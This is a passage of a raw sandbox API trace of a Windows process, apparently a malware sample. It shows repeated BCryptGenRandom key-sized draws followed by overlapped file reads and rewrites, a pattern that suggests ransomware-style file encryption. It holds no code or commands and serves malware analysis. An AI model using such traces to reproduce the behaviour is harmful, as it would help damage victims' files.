_Size=0x4) returned 0x1ff1930 [0085.978] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.979] free (_Block=0x1ff1930) [0085.979] free (_Block=0x1ff1a40) [0085.979] free (_Block=0x77d908) [0085.979] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.981] CloseHandle (hObject=0x3a0) returned 1 [0085.981] free (_Block=0x1fb18c0) [0085.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.982] CloseHandle (hObject=0x3ac) returned 1 [0085.982] free (_Block=0x3df0008) [0085.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.982] CloseHandle (hObject=0x3b8) returned 1 [0085.982] free (_Block=0x2031ed0) [0085.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.013] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.013] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0086.013] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0086.014] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0086.014] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0086.014] free (_Block=0x77d800) [0086.014] calloc (_Count=0x41, _Size=0x4) returned 0x1fb18c0 [0086.014] calloc (_Count=0x82, _Size=0x4) returned 0x1fb19d0 [0086.014] free (_Block=0x1fb18c0) [0086.014] free (_Block=0x1fb19d0) [0086.014] free (_Block=0x77d908) [0086.014] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0086.015] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.015] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0086.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.033] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.034] CloseHandle (hObject=0x3bc) returned 1 [0086.036] free (_Block=0x1fb18c0) [0086.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.045] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0086.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0086.047] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.047] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.047] free (_Block=0x1ff1e60) [0086.047] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.047] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.047] free (_Block=0x1ff1e60) [0086.047] free (_Block=0x1ff1930) [0086.047] free (_Block=0x77d800) [0086.047] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.048] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.048] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.064] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.065] CloseHandle (hObject=0x3bc) returned 1 [0086.068] free (_Block=0x1fb18c0) [0086.068] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.080] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.080] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0086.080] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.081] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0086.081] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.081] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.081] free (_Block=0x1ff1e60) [0086.081] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.081] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.081] free (_Block=0x1ff1e60) [0086.081] free (_Block=0x1ff1930) [0086.081] free (_Block=0x77d800) [0086.081] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.082] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.100] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.101] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.101] CloseHandle (hObject=0x3bc) returned 1 [0086.103] free (_Block=0x1fb18c0) [0086.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.112] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.112] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0086.112] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.113] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0086.113] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.113] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.113] free (_Block=0x1ff1e60) [0086.113] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.113] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.114] free (_Block=0x1ff1e60) [0086.114] free (_Block=0x1ff1930) [0086.114] free (_Block=0x77d800) [0086.114] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.114] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.115] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.115] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.128] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.129] CloseHandle (hObject=0x3bc) returned 1 [0086.130] free (_Block=0x1fb18c0) [0086.130] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.160] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.161] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0086.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0086.162] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.162] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.162] free (_Block=0x1ff1e60) [0086.162] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.162] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.162] free (_Block=0x1ff1e60) [0086.162] free (_Block=0x1ff1930) [0086.163] free (_Block=0x77d800) [0086.163] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.164] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.184] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xb04, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.185] CloseHandle (hObject=0x3b8) returned 1 [0086.186] free (_Block=0x1fb18c0) [0086.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0086.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0086.369] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.369] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.369] free (_Block=0x1ff1e60) [0086.369] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.369] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.370] free (_Block=0x1ff1e60) [0086.370] free (_Block=0x1ff1930) [0086.370] free (_Block=0x77d800) [0086.370] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0086.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0086.448] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.448] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.448] free (_Block=0x1ff1e60) [0086.448] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.448] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.448] free (_Block=0x1ff1e60) [0086.448] free (_Block=0x1ff1930) [0086.449] free (_Block=0x77d800) [0086.449] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0086.449] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.450] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x5ab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.469] ReadFile (in: hFile=0x3a0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0086.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.502] CloseHandle (hObject=0x3a0) returned 1 [0086.502] free (_Block=0x3df0008) [0086.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0086.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.518] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0086.518] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.518] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.518] free (_Block=0x1ff1e60) [0086.518] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.518] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.519] free (_Block=0x1ff1e60) [0086.519] free (_Block=0x1ff1930) [0086.523] free (_Block=0x77d800) [0086.523] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.525] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.594] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0086.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0086.700] CloseHandle (hObject=0x3a0) returned 1 [0086.701] free (_Block=0x3d70048) [0086.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0087.260] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0087.263] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.263] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.263] free (_Block=0x1ff1e60) [0087.263] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.263] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.264] free (_Block=0x1ff1e60) [0087.264] free (_Block=0x1ff1930) [0087.264] free (_Block=0x77d800) [0087.264] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, 